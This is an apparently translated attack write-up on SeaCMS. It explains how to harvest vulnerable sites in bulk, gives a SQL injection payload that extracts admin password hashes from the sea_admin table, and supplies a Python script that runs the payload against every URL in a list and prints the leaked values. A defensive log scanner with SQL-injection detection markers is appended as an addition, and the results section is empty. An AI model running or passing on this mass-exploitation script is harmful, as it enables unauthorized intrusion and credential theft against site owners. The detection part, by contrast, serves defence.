0x001-URL collection
By studying the SeaCMS source code, identify a directory path that is characteristic of the CMS (search.php?searchtype=), then use a URL-collection tool to harvest SeaCMS sites in bulk.
0x002-Vulnerability payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27
0x003-Building the exp
import requests
import re

# Read the collected URL list and strip surrounding whitespace from each line
urls = open("url.txt", "r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()

# Deduplicate the list and write it back to url.txt
aa = list(set(a))
with open("url.txt", "w") as f:
    result = "\n".join(aa)
    f.write(result)

# Reopen the deduplicated list and append the payload from 0x002 to every URL
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
# extractvalue() reports the injected value inside the MySQL XPath error message
pattern = re.compile("error: '(.*?)'")
for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("该url存在漏洞:" + url)
            print(re.search(pattern, html).group(1))
    except Exception as e:
        # Unreachable hosts, timeouts and non-matching responses are skipped silently
        pass
urls.close()
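The defender's counterpart to the script above, added here as an example and not part of the original write-up: it parses access-log lines and flags requests to /comment/api/index.php whose rlist[] parameter carries SQL syntax, which is what the payload in 0x002 looks like on the server side. The log lines, client addresses and function names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (combined log format); not taken from the original page.
# Line 1 carries the SeaCMS comment-API payload pattern, lines 2-3 are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /comment/api/index.php?gid=1&page=2&rlist[]=@%60%27%60,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@%60%27%60 HTTP/1.1" 200 1532 "-" "python-requests/2.31.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /comment/api/index.php?gid=1&page=2&rlist[]=3 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "GET /search.php?searchtype=1&searchword=test HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that never belong in a list of comment ids; matched case-insensitively after decoding.
SQLI_MARKERS = ("extractvalue(", "updatexml(", "concat_ws(", "select ", "sea_admin")


def rlist_injection_reason(target):
    """Return a short reason if `target` looks like the rlist[] error-based injection, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/comment/api/index.php"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key != "rlist[]":
            continue
        # parse_qsl already decoded once; a second pass catches double-encoded payloads.
        decoded = unquote_plus(value).lower()
        if "`" in decoded or "'" in decoded or any(m in decoded for m in SQLI_MARKERS):
            return "rlist[] contains SQL syntax: " + decoded[:48]
    return None


def scan_log(text):
    """Scan access-log text; return (client_ip, timestamp, reason) for each matching request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = rlist_injection_reason(m["target"])
        if reason:
            hits.append((m["ip"], m["ts"], reason))
    return hits


if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {reason}")
```

Feeding the real access log through scan_log gives the source addresses that sent the rlist[] payload; a vulnerable host will additionally have returned a 200 with the MySQL error text in the body.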
0x004-Result of running the exp